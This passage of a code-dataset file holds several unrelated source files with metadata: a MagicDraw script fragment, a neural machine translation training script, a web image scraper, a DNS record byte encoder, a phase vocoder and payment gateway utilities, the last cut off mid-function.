Application.getInstance().getMainFrame().getBrowser().getActiveTree().getSelectedNode().getUserObject()\n if mode == 'd':\n selected = Application.getInstance().getProject().getActiveDiagram().getSelected().get(0).getElement()\n if not isinstance(selected, Property):\n gl.log(\"You must select a part!!!\")\n return\n gl.log('selected: '+ selected.getQualifiedName())\n try:\n SessionManager.getInstance().createSession(\"movepart\")\n choice = 
JOptionPane.showConfirmDialog(None, \"Move part up?\", \"Move Part\", JOptionPane.YES_NO_OPTION)\n        if choice == JOptionPane.YES_OPTION:\n            moveup(selected)\n        else:\n            movedown(selected)\n        SessionManager.getInstance().closeSession()\n    except:\n        SessionManager.getInstance().cancelSession()\n        exceptionType, exceptionValue, exceptionTraceback = sys.exc_info()\n        messages=traceback.format_exception(exceptionType, exceptionValue, exceptionTraceback)\n        for message in messages:\n            gl.log(message)","sub_path":"SystemsReasoner/EHMMovePart.py","file_name":"EHMMovePart.py","file_ext":"py","file_size_in_byte":21407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"436652824","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os, sys\nWMT_ROOT = os.environ[\"WMT_ROOT\"]\nassert WMT_ROOT\n\nfrom argparse import ArgumentParser\n\nfrom deepy import *\nfrom deepy.trainers.trainers import FineTuningAdaGradTrainer\nfrom neuralmt import TMCostLayer, SoftAttentionalLayer\n\ntheano.config.compute_test_value = 'ignore'\n\ncounter = 0\n\nif __name__ == '__main__':\n    ap = ArgumentParser()\n    ap.add_argument(\"--model_path\", default=\"{}/models/model1.uncompressed.npz\".format(WMT_ROOT))\n    ap.add_argument(\"--word_embed\", default=1000, type=int)\n    ap.add_argument(\"--src_vocab_size\", default=80000, type=int)\n    ap.add_argument(\"--tgt_vocab_size\", default=40000, type=int)\n    ap.add_argument(\"--hidden_size\", default=1000, type=int)\n    args = ap.parse_args()\n\n    src_var = create_var(T.imatrix(), test_shape=[64, 10], test_dtype=\"int32\")\n    src_mask_var = create_var(T.matrix(), test_shape=[64, 10], test_dtype=\"float32\")\n    tgt_var = create_var(T.imatrix(), test_shape=[64, 10], test_dtype=\"int32\")\n    tgt_mask_var = create_var(T.matrix(), test_shape=[64, 10], test_dtype=\"float32\")\n\n    encoder = Block()\n    decoder = Block()\n    expander = Block()\n\n    src_embed_layer = WordEmbedding(args.word_embed, args.src_vocab_size)\n\n    encoder_embed = src_embed_layer.belongs_to(encoder).compute(src_var, mask=src_mask_var)\n\n    # encoder\n    forward_rnn_var = (GRU(args.hidden_size, input_type=\"sequence\", output_type=\"sequence\", mask=src_mask_var)\n                       .belongs_to(encoder).compute(encoder_embed))\n    backward_rnn_var = Chain(GRU(args.hidden_size, input_type=\"sequence\", output_type=\"sequence\", mask=src_mask_var, backward=True),\n                             Reverse3D()).belongs_to(encoder).compute(encoder_embed)\n    hidden_layer = Concatenate(axis=2).compute(forward_rnn_var, backward_rnn_var)\n\n    # decoder\n    # the first token is <s>=1\n    feedback_var = tgt_var.apply(lambda t: T.concatenate([T.ones((t.shape[0], 1), dtype=\"int32\"), t[:, :-1]], axis=1))\n\n    tgt_embed_layer = WordEmbedding(args.word_embed, args.tgt_vocab_size)\n    tgt_embed_layer.initialize(1)\n\n    second_input = tgt_embed_layer.belongs_to(decoder).compute(feedback_var, mask=tgt_mask_var)\n\n    second_input = DimShuffle(1, 0, 2).compute(second_input)\n\n\n    recurrent_unit = LSTM(args.hidden_size, input_type=\"sequence\", output_type=\"sequence\", additional_input_dims=[args.word_embed])\n\n    attention_layer = SoftAttentionalLayer(recurrent_unit)\n    attention_var = attention_layer.belongs_to(decoder).compute(hidden_layer, mask=src_mask_var, feedback=second_input, steps=tgt_var.shape[1])\n\n    # expander\n    output_var = Chain(Dense(600), Dense(args.tgt_vocab_size)).belongs_to(expander).compute(attention_var)\n\n    cost = TMCostLayer(tgt_var, tgt_mask_var, args.tgt_vocab_size).compute(output_var)\n\n\n    model = 
ComputationalGraph(input_vars=[src_var, src_mask_var],\n                               target_vars=[tgt_var, tgt_mask_var],\n                               blocks=[encoder, decoder, expander],\n                               cost=cost)\n\n    data = OnDiskDataset(\"{}/aspec.enja1_train.pkl\".format(WMT_ROOT),\n                         valid_path=\"{}/aspec.enja1_valid.pkl\".format(WMT_ROOT),\n                         cached=True, shuffle_memory=False)\n\n    # Train\n    training_config = {\"gradient_clipping\": 3,\n                       \"auto_save\": args.model_path,\n                       \"patience\": 20}\n\n    trainer = MultiGPUTrainer(model, training_config, method='sgd',\n                              learning_rate=1.0, step_len=10)\n\n    trainer.run(data)","sub_path":"examples/lstm_search/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"438471206","text":"from selenium import webdriver\nfrom bs4 import BeautifulSoup\nimport os\nimport urllib.request\nimport time\n\ndef find_imgs(html):\n    soup=BeautifulSoup(html,\"html.parser\")\n    imgs_data=soup.find_all('p')\n    print(len(imgs_data))\n    for i in range(len(imgs_data)):\n        try:\n            img_url=imgs_data[i].find('img').get('src')\n            img_name=str(i+1)+\".png\"\n            img_url=\"https\"+img_url.split(\"https\")[1]\n            print(img_name,img_url)\n            getAndSaveImg(img_url, img_name)\n        except AttributeError as e:\n            pass\n\n\n# save the image\ndef createFileWithFileName(localPathParam,fileName):\n    isExists = os.path.exists(localPathParam)\n    if not isExists:\n        # create the directory if it does not exist\n        # directory creation helper\n        os.makedirs(localPathParam)\n        print(localPathParam + ' created successfully')\n    totalPath=localPathParam+'\\\\'+fileName\n    if not os.path.exists(totalPath):\n        file=open(totalPath,'a+')\n        file.close()\n    return totalPath\n\n\n# save the image\ndef getAndSaveImg(img_url, img_name):\n    if (len(img_url) != 0):\n        fileName = img_name\n        file_path=u\"D:\\\\BI\\\\HUAWEI\\\\img\"\n        urllib.request.urlretrieve(img_url, createFileWithFileName(file_path, fileName))\n\n\n\nif __name__==\"__main__\":\n    # fetch data from the data table\n    browser = \"Firefox\"\n    if browser == \"Chrome\":\n        options = webdriver.ChromeOptions()\n        # options.add_experimental_option(\"excludeSwitches\", [\"ignore-certificate-errors\"])  # remove unsupported command-line switches\n        options.add_argument(\n            '--user-data-dir=C:/Users/CC-SERVER/AppData/Local/Google/Chrome/User Data/Default')  # set this to your own user data directory\n        driver = webdriver.Chrome(chrome_options=options)\n    else:\n        if browser == \"Firefox\":\n            driver = webdriver.Firefox()\n        else:\n            driver = webdriver.PhantomJS()\n\n    url=\"http://www.hroot.com/d-9367999.hr?%E9%87%8D%E7%A3%85%EF%BC%9A%E5%8D%8E%E4%B8%BA%E4%BA%BA%E5%8A%9B%E8%B5%84%E6%BA%90%E7%AE%A1%E7%90%86%E7%BA%B2%E8%A6%812.0%EF%BC%8C87%E9%A1%B5PPT%E5%85%A8%E6%8F%AD%E7%A7%98%EF%BC%81-HR360%E5%B7%A5%E5%9D%8A-hr\"\n    driver.get(url)\n    time.sleep(5)\n    html=driver.page_source\n    find_imgs(html)","sub_path":"日常工作/华为ppt.py","file_name":"华为ppt.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"113763633","text":"import socket\nimport struct\nimport ipaddress\n\nimport Tools\nimport Constants\n\n''' This method takes the header ID, flag bytes, Question count,\n    Answer count, Authority count and Additional count,\n    constructs the header bytes from them, puts them in a byte array\n    and returns it.\n'''\n\n\ndef construct_header(header_id, flags, q_count,\n                     an_count, ath_count, add_count):\n    data = bytearray()\n    data += short_to_bytes(header_id)\n    data += short_to_bytes(flags)\n    data += short_to_bytes(q_count)\n    data += short_to_bytes(an_count)\n    data += short_to_bytes(ath_count)\n    data += short_to_bytes(add_count)\n\n    return 
data\n\n\n''' This method takes a question object and converts it\n    to a byte array. '''\n\n\ndef question_to_bytes(question):\n    return construct_question(question.q_name,\n                              question.q_type,\n                              question.q_class)\n\n\n''' This method takes q_name, q_type and q_class,\n    constructs the Question bytes from them, puts them in a byte array\n    and returns it.\n'''\n\n\ndef construct_question(q_name, q_type, q_class):\n    data = get_bytes_from_domain_name(q_name.split(\".\"))\n    # add Question type bytes\n    data += short_to_bytes(q_type)\n    # add Question class bytes\n    data += short_to_bytes(q_class)\n\n    return data\n\n\n''' This method takes an answer object and converts it\n    to a byte array. '''\n\n\ndef answer_to_bytes(answer):\n    return construct_answer(answer.a_name, answer.a_type,\n                            answer.a_class, answer.a_ttl,\n                            answer.rdlength, answer.response_data)\n\n\n''' This method takes the a_name, a_type, a_class, ttl, rd_length and r_data\n    parameters of the Answer field and constructs the answer bytes from them. '''\n\n\ndef construct_answer(a_name, a_type, a_class, ttl, rd_length, r_data):\n    data = get_bytes_from_domain_name(a_name.split(\".\"))\n    data += short_to_bytes(a_type)\n    data += short_to_bytes(a_class)\n    data += int_to_bytes(ttl)\n\n    byte_rdata = get_bytes_from_rdata(r_data, a_type, rd_length)\n\n    data += short_to_bytes(len(byte_rdata))\n    data += byte_rdata\n\n    return data\n\n\n''' This method takes an authority object and converts it to bytes. '''\n\n\ndef authority_to_bytes(authority):\n    return construct_byte_authority(authority.name,\n                                    authority.a_type,\n                                    authority.a_class,\n                                    authority.ttl,\n                                    authority.rd_length,\n                                    authority.data)\n\n\n''' This method takes the authority parameters and constructs a byte array from them. '''\n\n\ndef construct_byte_authority(a_name, a_type, a_class, ttl, rd_length, data):\n\n    byte_data = get_bytes_from_domain_name(a_name.split(\".\"))\n    byte_data += short_to_bytes(a_type)\n    byte_data += short_to_bytes(a_class)\n    byte_data += int_to_bytes(ttl)\n    byte_domain = get_bytes_from_rdata(data, a_type, rd_length)\n    byte_data += short_to_bytes(len(byte_domain))\n    byte_data += byte_domain\n\n    return byte_data\n\n\n''' This method takes an additional object and converts it to bytes. '''\n\n\ndef additional_to_bytes(additional):\n    return construct_byte_additional(additional.name,\n                                     additional.a_type,\n                                     additional.a_class,\n                                     additional.ttl,\n                                     additional.rd_length,\n                                     additional.data)\n\n\n''' This method takes the additional parameters and constructs a byte array from them. '''\n\n\ndef construct_byte_additional(a_name, a_type, a_class, ttl, rd_length, data):\n\n    byte_data = get_bytes_from_domain_name(a_name.split(\".\"))\n    byte_data += short_to_bytes(a_type)\n    byte_data += short_to_bytes(a_class)\n    byte_data += int_to_bytes(ttl)\n    r_data = get_bytes_from_rdata(data, a_type, rd_length)\n    byte_data += short_to_bytes(len(r_data))\n    byte_data += r_data\n\n    return byte_data\n\n\n''' This method takes r_data and its type and converts it to a byte array. 
'''\n\n\ndef get_bytes_from_rdata(r_data, a_type, rd_length):\n    # A\n    if a_type == Constants.A:\n        ip = struct.unpack(\"!I\", socket.inet_aton(r_data))[0]\n        return int_to_bytes(ip)\n\n    # AAAA\n    if a_type == Constants.AAAA:\n        ipv6 = int(ipaddress.IPv6Address(r_data))\n        return ipv6int_to_bytes(ipv6)\n\n    # NS\n    if a_type == Constants.NS:\n        return get_bytes_from_domain_name(r_data.split(\".\"))\n\n    # MX\n    if a_type == Constants.MX:\n        preference, exchange = r_data.split(\" \")\n        data_bytes = short_to_bytes(int(preference))\n        data_bytes += get_bytes_from_domain_name(exchange.split(\".\"))\n\n        return data_bytes\n\n    # SOA\n    if a_type == Constants.SOA:\n        soa_parameters = r_data.split(\" \")\n        m_name = soa_parameters[0]\n        r_name = soa_parameters[1]\n        serial = soa_parameters[2]\n        refresh = soa_parameters[3]\n        retry = soa_parameters[4]\n        expire = soa_parameters[5]\n        minimum = soa_parameters[6]\n\n        byte_data = get_bytes_from_domain_name(m_name.split(\".\"))\n        byte_data += get_bytes_from_domain_name(r_name.split(\".\"))\n        byte_data += int_to_bytes(int(serial))\n        byte_data += int_to_bytes(int(refresh))\n        byte_data += int_to_bytes(int(retry))\n        byte_data += int_to_bytes(int(expire))\n        byte_data += int_to_bytes(int(minimum))\n\n        return byte_data\n\n    # TXT\n    if a_type == Constants.TXT:\n        byte_data = bytes(r_data, 'utf-8')\n        text_len = len(byte_data)\n        r_data = chr(text_len) + r_data\n\n        return bytes(r_data, 'utf-8')\n\n    # unknown record type: encode the raw string (bytes(str) with no encoding raises TypeError in Python 3)\n    # CNAME\n    if a_type == Constants.CNAME:\n        return get_bytes_from_domain_name(r_data.split(\".\"))\n\n    # unknown\n    return bytes(r_data, 'utf-8')\n\n\n''' This method converts a 128 bit integer\n    to byte data. '''\n\n\ndef ipv6int_to_bytes(ipv6):\n    left_bytes = ipv6 >> 64\n    right_bytes = ipv6 % (1 << 64)\n\n    data = long_to_bytes(left_bytes)\n    data += long_to_bytes(right_bytes)\n\n    return data\n\n\n''' This method converts a 64 bit integer\n    to byte data. 
'''\n\n\ndef long_to_bytes(long):\n    left_bytes = long >> 32\n    right_bytes = long % (1 << 32)\n\n    data = int_to_bytes(left_bytes)\n    data += int_to_bytes(right_bytes)\n\n    return data\n\n\n''' This method takes an int type number, splits its bytes\n    and adds them to a byte array one-by-one.\n'''\n\n\ndef int_to_bytes(four_bytes):\n    data = bytearray()\n    data += short_to_bytes(four_bytes >> 16)\n    data += short_to_bytes(four_bytes % (1 << 16))\n\n    return data\n\n\n''' This method takes a short type number, splits its bytes\n    and adds them to a byte array one-by-one.\n'''\n\n\ndef short_to_bytes(two_bytes):\n    # two_bytes = socket.htons(two_bytes)\n    data = bytearray()\n    data.append(two_bytes >> 8)\n    data.append(two_bytes % (1 << 8))\n\n    return data\n\n\ndef get_bytes_from_domain_name(domain_name_zones):\n    domain_name_bytes = bytearray()\n\n    for zone in domain_name_zones:\n        if len(zone) > 0:\n            zone_bytes = get_bytes(zone)\n            for zone_byte in zone_bytes:\n                domain_name_bytes.append(zone_byte)\n\n    # indicates the end of the string\n    domain_name_bytes.append(0x00)\n    return domain_name_bytes\n\n\ndef get_bytes(zone):\n    arr = bytearray()\n    arr.append(len(zone))\n    for ch in zone:\n        arr.append(ord(ch))\n\n    return arr\n","sub_path":"DNS Server/Constructor.py","file_name":"Constructor.py","file_ext":"py","file_size_in_byte":7457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"482940475","text":"import pyaudio\nimport numpy, wave\nimport pianoputer\n\nclass PhaseVocoder:\n    def __init__(self, file_name):\n        self.chunk = 8192*8\n        self.wf = wave.open(file_name, 'rb')\n        \n        self.tempo = 0.5\n        self.pitch = 5\n        \n    # Performs the STFT on a chunk of data and returns the new data\n    def analyze_data(self, data):\n        new_data = pianoputer.pitchshift(data, self.pitch, self.tempo, 2**12, 2**10)\n\n        return new_data\n    \n    # Writes new audio to a file\n    def write_data(self, data):\n        output = wave.open(\"output_both2.wav\", 'wb')\n        output.setnchannels(self.wf.getnchannels())\n        output.setsampwidth(self.wf.getsampwidth())\n        output.setframerate(self.wf.getframerate())\n        # data is already a single bytes string; b''.join() over it would fail on Python 3\n        output.writeframes(data)\n        output.close()\n    \n    # Performs the phase vocoding algorithm\n    def start(self):\n        unformatted = self.wf.readframes(self.wf.getnframes())\n        data = numpy.fromstring(unformatted, numpy.int16)\n        \n        new_data = self.analyze_data(data).astype(numpy.int16).tostring()\n\n        self.write_data(new_data)\n        \nif __name__ == \"__main__\":\n    pv = PhaseVocoder(\"92002__jcveliz__violin-origional.wav\")\n    pv.start()","sub_path":"phase_vocoder3.py","file_name":"phase_vocoder3.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"7594280","text":"import json\nimport logging\nfrom decimal import Decimal\nfrom functools import wraps\nfrom typing import Dict\n\nfrom django.conf import settings\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.db import transaction\nfrom django.utils.translation import pgettext_lazy\n\nfrom . 
import (\n    ChargeStatus, CustomPaymentChoices, GatewayError, OperationType,\n    PaymentError, TransactionKind, get_payment_gateway)\nfrom ..account.models import Address, User\nfrom ..checkout.models import Cart\nfrom ..core import analytics\nfrom ..task import TaskEvents, TaskEventsEmails\nfrom ..task.emails import send_payment_confirmation\nfrom ..task.models import Task\nfrom .models import Payment, Transaction\n\nlogger = logging.getLogger(__name__)\n\nGENERIC_TRANSACTION_ERROR = 'Transaction was unsuccessful'\nREQUIRED_GATEWAY_KEYS = {\n    'transaction_id', 'is_success', 'kind', 'error', 'amount', 'currency'}\nALLOWED_GATEWAY_KINDS = {choices[0] for choices in TransactionKind.CHOICES}\n\n\ndef get_gateway_operation_func(gateway, operation_type):\n    \"\"\"Return gateway method based on the operation type to be performed.\"\"\"\n    if operation_type == OperationType.PROCESS_PAYMENT:\n        return gateway.process_payment\n    if operation_type == OperationType.AUTH:\n        return gateway.authorize\n    if operation_type == OperationType.CAPTURE:\n        return gateway.capture\n    if operation_type == OperationType.CHARGE:\n        return gateway.charge\n    if operation_type == OperationType.VOID:\n        return gateway.void\n    if operation_type == OperationType.REFUND:\n        return gateway.refund\n\n\ndef create_payment_information(\n        payment: Payment, payment_token: str = None,\n        amount: Decimal = None) -> Dict:\n    \"\"\"Extracts task information along with payment details.\n\n    Returns information required to process payment and additional\n    billing/delivery addresses for optional fraud-prevention mechanisms.\n    \"\"\"\n    return {\n        'token': payment_token,\n        'amount': amount or payment.total,\n        'currency': payment.currency,\n        'billing': (\n            payment.task.billing_address.as_data()\n            if payment.task.billing_address else None),\n        'delivery': (\n            payment.task.delivery_address.as_data()\n            if payment.task.delivery_address else None),\n        'task_id': payment.task.id,\n        'customer_ip_address': payment.customer_ip_address,\n        'customer_email': payment.billing_email}\n\n\ndef handle_fully_paid_order(task):\n    task.events.create(type=TaskEvents.TASK_FULLY_PAID.value)\n    if task.get_user_current_email():\n        send_payment_confirmation.delay(task.pk)\n        task.events.create(\n            type=TaskEvents.EMAIL_SENT.value,\n            parameters={\n                'email': task.get_user_current_email(),\n                'email_type': TaskEventsEmails.PAYMENT.value})\n    try:\n        analytics.report_order(task.tracking_client_id, task)\n    except Exception:\n        # Analytics failing should not abort the checkout flow\n        logger.exception('Recording task in analytics failed')\n\n\ndef require_active_payment(view):\n    \"\"\"Require an active payment instance.\n\n    Decorate a view to check if payment is authorized, so any actions\n    can be performed on it.\n    \"\"\"\n    @wraps(view)\n    def func(payment: Payment, *args, **kwargs):\n        if not payment.is_active:\n            raise PaymentError('This payment is no longer active.')\n        return view(payment, *args, **kwargs)\n    return func\n\n\ndef create_payment(\n        gateway: str,\n        total: Decimal,\n        currency: str,\n        email: str,\n        billing_address: Address,\n        customer_ip_address: str = '',\n        payment_token: str = '',\n        extra_data: Dict = None,\n        checkout: Cart = None,\n        task: Task = None) -> Payment:\n    \"\"\"Create a payment instance.\n\n    This method is responsible for creating payment instances that work for\n    both Django views and GraphQL mutations.\n    \"\"\"\n    defaults = {\n        'billing_email': email,\n        'billing_first_name': billing_address.first_name,\n        'billing_last_name': billing_address.last_name,\n        
'billing_company_name': billing_address.company_name,\n        'billing_address_1': billing_address.street_address_1,\n        'billing_address_2': billing_address.street_address_2,\n        'billing_city': billing_address.city,\n        'billing_postal_code': billing_address.postal_code,\n        'billing_country_code': billing_address.country.code,\n        'billing_country_area': billing_address.country_area,\n        'currency': currency,\n        'gateway': gateway,\n        'total': total}\n\n    if extra_data is None:\n        extra_data = {}\n\n    data = {\n        'is_active': True,\n        'customer_ip_address': customer_ip_address,\n        'extra_data': extra_data,\n        'token': payment_token}\n\n    if task is not None:\n        data['task'] = task\n    if checkout is not None:\n        data['checkout'] = checkout\n\n    payment, _ = Payment.objects.get_or_create(defaults=defaults, **data)\n    return payment\n\n\n@transaction.atomic\ndef mark_task_as_paid(task: Task, request_user: User):\n    \"\"\"Mark task as paid.\n\n    Allows creating a payment for a task without actually performing any\n    payment by the gateway.\n    \"\"\"\n    payment = create_payment(\n        gateway=CustomPaymentChoices.MANUAL,\n        payment_token='',\n        currency=task.total.gross.currency,\n        email=task.user_email,\n        billing_address=task.billing_address,\n        total=task.total.gross.amount,\n        task=task)\n    payment.charge_status = ChargeStatus.FULLY_CHARGED\n    payment.captured_amount = task.total.gross.amount\n    payment.save(update_fields=['captured_amount', 'charge_status'])\n    task.events.create(\n        type=TaskEvents.TASK_MARKED_AS_PAID.value, user=request_user)\n\n\ndef create_transaction(\n        payment: Payment, kind: str, payment_information: Dict,\n        gateway_response: Dict = None, error_msg=None) -> Transaction:\n    \"\"\"Create a transaction based on transaction kind and gateway response.\"\"\"\n    if gateway_response is None:\n        gateway_response = {}\n\n    # Default values for token, amount, currency are only used in cases where\n    # response from gateway was invalid or an exception occurred\n    txn = Transaction.objects.create(\n        payment=payment,\n        kind=gateway_response.get('kind', kind),\n        token=gateway_response.get(\n            'transaction_id', payment_information['token']),\n        is_success=gateway_response.get('is_success', False),\n        amount=gateway_response.get('amount', payment_information['amount']),\n        currency=gateway_response.get(\n            'currency', payment_information['currency']),\n        error=gateway_response.get('error', error_msg),\n        gateway_response=gateway_response)\n    return txn\n\n\ndef gateway_get_client_token(gateway_name: str):\n    \"\"\"Gets a client token that will be used as a customer's identifier for\n    client-side tokenization of the chosen payment method.\n    \"\"\"\n    gateway, gateway_params = get_payment_gateway(gateway_name)\n    return gateway.get_client_token(connection_params=gateway_params)\n\n\ndef clean_charge(payment: Payment, amount: Decimal):\n    \"\"\"Check if payment can be charged.\"\"\"\n    if amount <= 0:\n        raise PaymentError('Amount should be a positive number.')\n    if not payment.can_charge():\n        raise PaymentError('This payment cannot be charged.')\n    if amount > payment.total or amount > (\n            payment.total - payment.captured_amount):\n        raise PaymentError('Unable to charge more than un-captured amount.')\n\n\ndef clean_capture(payment: Payment, amount: Decimal):\n    \"\"\"Check if payment can be captured.\"\"\"\n    if amount <= 0:\n        raise PaymentError('Amount should be a positive number.')\n    if not payment.can_capture():\n        raise PaymentError('This payment cannot be captured.')\n    if amount > payment.total or amount > (\n            payment.total - 
payment.captured_amount):\n        raise PaymentError('Unable to capture more than authorized amount.')\n\n\ndef clean_authorize(payment: Payment):\n    \"\"\"Check if payment can be authorized.\"\"\"\n    if not payment.can_authorize():\n        raise PaymentError('Charged transactions cannot be authorized again.')\n\n\ndef clean_mark_task_as_paid(task: Task):\n    \"\"\"Check if a task can be marked as paid.\"\"\"\n    if task.payments.exists():\n        raise PaymentError(\n            pgettext_lazy(\n                'Mark task as paid validation error',\n                'Tasks with payments can not be manually marked as paid.'))\n\n\ndef call_gateway(operation_type, payment, payment_token, **extra_params):\n    \"\"\"Helper that calls the passed gateway function and handles exceptions.\n\n    Additionally does validation of the returned gateway response.\n    \"\"\"\n    gateway, connection_params = get_payment_gateway(payment.gateway)\n    gateway_response = None\n    error_msg = None\n\n    payment_information = create_payment_information(\n        payment, payment_token, **extra_params\n    )\n\n    try:\n        func = get_gateway_operation_func(gateway, operation_type)\n    except AttributeError:\n        error_msg = 'Gateway doesn\\'t implement {} operation'.format(\n            operation_type.name)\n        logger.exception(error_msg)\n        raise PaymentError(error_msg)\n\n    # The transaction kind is provided as a default value\n    # for creating transactions when the gateway returns an invalid response\n    # The PROCESS_PAYMENT operation has CAPTURE as default transaction kind\n    # For other operations, the transaction kind is the same as the operation type\n    default_transaction_kind = TransactionKind.CAPTURE\n    if operation_type != OperationType.PROCESS_PAYMENT:\n        default_transaction_kind = getattr(\n            TransactionKind, OperationType(operation_type).name)\n\n    # Validate the default transaction kind\n    if default_transaction_kind not in dict(TransactionKind.CHOICES):\n        error_msg = 'The default transaction kind is invalid'\n        logger.exception(error_msg)\n        raise PaymentError(error_msg)\n\n    try:\n        gateway_response = func(\n            payment_information=payment_information,\n            connection_params=connection_params)\n        validate_gateway_response(gateway_response)\n    except GatewayError:\n        error_msg = 'Gateway response validation failed'\n        logger.exception(error_msg)\n        gateway_response = None  # Set response empty as the validation failed\n    except Exception:\n        error_msg = 'Gateway encountered an error'\n        logger.exception(error_msg)\n    finally:\n        if not isinstance(gateway_response, list):\n            gateway_response = [gateway_response]\n        transactions = []\n        for response in gateway_response:\n            transactions.append(create_transaction(\n                payment=payment,\n                kind=default_transaction_kind,\n                payment_information=payment_information,\n                error_msg=error_msg,\n                gateway_response=response))\n\n    for transaction in transactions:\n        if not transaction.is_success:\n            # Attempt to get errors from response, if none raise a generic one\n            raise PaymentError(transaction.error or GENERIC_TRANSACTION_ERROR)\n\n    return transactions[-1]\n\n\ndef validate_gateway_response(responses):\n    \"\"\"Validates response to be a correct format for Saleor to process.\"\"\"\n    if not isinstance(responses, (dict, list)):\n        raise GatewayError('Gateway needs to return a dictionary or a list')\n\n    if not isinstance(responses, list):\n        responses = [responses]\n\n    field_types = {\n        'amount': Decimal,\n        'currency': str,\n        'is_success': bool,\n        'kind': str,\n        'transaction_id': str,\n        'error': (type(None), str),\n    }\n\n    for response in responses:\n        if not REQUIRED_GATEWAY_KEYS.issubset(response):\n            raise GatewayError(\n                'Gateway 
response needs to contain the following keys: {}'.format(\n                    sorted(REQUIRED_GATEWAY_KEYS)))\n\n        for name, value in response.items():\n            if name in field_types:\n                if not isinstance(value, field_types[name]):\n                    raise GatewayError('{} must be of type {}, was {}'.format(\n                        name, field_types[name], type(value)))\n\n        if response['kind'] not in ALLOWED_GATEWAY_KINDS:\n            raise GatewayError(\n                'Gateway response kind must be one of {}'.format(\n                    sorted(ALLOWED_GATEWAY_KINDS)))\n\n        if response['currency'] != settings.DEFAULT_CURRENCY:\n            logger.warning('Transaction currency is different than Saleor\\'s.')\n\n        try:\n            json.dumps(response, cls=DjangoJSONEncoder)\n        except (TypeError, ValueError):\n            raise GatewayError(\n                'Gateway response needs to be json serializable')\n\n\ndef _gateway_postprocess(transaction, payment):\n    transaction_kind = transaction.kind\n\n    if transaction_kind in [TransactionKind.CHARGE, TransactionKind.CAPTURE]:\n        payment.captured_amount += transaction.amount\n\n        # Set payment charge status to fully charged\n        # only if there is no remaining amount to charge\n        payment.charge_status = ChargeStatus.PARTIALLY_CHARGED\n        if payment.get_charge_amount() <= 0:\n            payment.charge_status = ChargeStatus.FULLY_CHARGED\n\n        payment.save(update_fields=['charge_status', 'captured_amount'])\n        task = payment.task\n        if task and task.is_fully_paid():\n            handle_fully_paid_order(task)\n\n    elif transaction_kind == TransactionKind.VOID:\n        payment.is_active = False\n        payment.save(update_fields=['is_active'])\n\n    elif transaction_kind == TransactionKind.REFUND:\n        changed_fields = ['captured_amount']\n        payment.captured_amount -= transaction.amount\n        payment.charge_status = ChargeStatus.PARTIALLY_REFUNDED\n        if payment.captured_amount <= 0:\n            payment.charge_status = ChargeStatus.FULLY_REFUNDED\n            payment.is_active = False\n            changed_fields += ['charge_status', 'is_active']\n        payment.save(update_fields=changed_fields)\n\n\n@require_active_payment\ndef gateway_process_payment(\n        payment: Payment, payment_token: str) -> Transaction:\n    \"\"\"Performs whole payment process on a gateway.\"\"\"\n    transaction = call_gateway(\n        operation_type=OperationType.PROCESS_PAYMENT,\n        payment=payment, payment_token=payment_token, amount=payment.total)\n\n    _gateway_postprocess(transaction, payment)\n    return transaction\n\n\n@require_active_payment\ndef gateway_charge(\n        payment: Payment, payment_token: str,\n        amount: Decimal = None) -> Transaction:\n    \"\"\"Performs authorization and capture in a single run.\n\n    For gateways not supporting the authorization it should be a\n    dedicated CHARGE transaction.\n\n    For gateways not supporting capturing without authorizing,\n    it should create two transactions - auth and capture, but only the last one\n    is returned.\n    \"\"\"\n    if amount is None:\n        amount = payment.get_charge_amount()\n    clean_charge(payment, amount)\n\n    transaction = call_gateway(\n        operation_type=OperationType.CHARGE,\n        payment=payment, payment_token=payment_token, amount=amount)\n\n    _gateway_postprocess(transaction, payment)\n    return transaction\n\n\n@require_active_payment\ndef gateway_authorize(payment: Payment, payment_token: str) -> Transaction:\n    \"\"\"Authorizes the payment and creates the relevant transaction.\n\n    Args:\n        - payment_token: One-time-use reference to payment information.\n    \"\"\"\n    clean_authorize(payment)\n\n    return call_gateway(\n        operation_type=OperationType.AUTH,\n        payment=payment, payment_token=payment_token)\n\n\n@require_active_payment\ndef gateway_capture(payment: Payment, amount: Decimal = None) -> 
Transaction:\n \"\"\"Captures the money that was reserved during the authorization stage.\"\"\"\n if amount is None:\n amount = payment.get_charge_amount()\n clean_capture(payment, amount)\n\n auth_transaction = payment.transactions.filter(\n kind=TransactionKind.AUTH, is_success=True).first()\n if auth_transaction is None:\n raise PaymentError('Cannot capture unauthorized transaction')\n payment_token = auth_transaction.token\n\n transaction = call_gateway(\n operation_type=OperationType.CAPTURE,\n payment=payment, payment_token=payment_token, amount=amount)\n\n _gateway_postprocess(transaction, payment)\n return transaction\n\n\n@require_active_payment\ndef gateway_void(payment) -> Transaction:\n if not payment.can_void():\n raise PaymentError('Only pre-authorized transactions can be voided.')\n\n auth_transaction = payment.transactions.filter(\n kind=TransactionKind.AUTH, is_success=True).first()\n if auth_transaction is None:\n raise PaymentError('Cannot void unauthorized transaction')\n payment_token = auth_transaction.token\n\n transaction = call_gateway(\n operation_type=OperationType.VOID,\n payment=payment, payment_token=payment_token)\n\n _gateway_postprocess(transaction, payment)\n return transaction\n\n\n@require_active_payment\ndef gateway_refund(payment, amount: Decimal = None) -> Transaction:\n \"\"\"Refunds the charged funds back to the customer.\n Refunds can be total or partial.\n \"\"\"\n if amount is None:\n # If no amount is specified, refund the maximum possible\n amount = payment.captured_amount\n\n if not payment.can_refund():\n raise PaymentError('This payment cannot be refunded.')\n\n if amount <= 0:\n raise PaymentError('Amount should be a positive number.')\n if amount > payment.captured_amount:\n raise PaymentError('Cannot refund more than captured')\n\n transaction = payment.transactions.filter(\n kind__in=[TransactionKind.CAPTURE, TransactionKind.CHARGE],\n is_success=True).first()\n if transaction is None:\n raise PaymentError('Cannot refund uncaptured/uncharged transaction')\n payment_token = transaction.token\n\n transaction = call_gateway(\n operation_type=OperationType.REFUND,\n 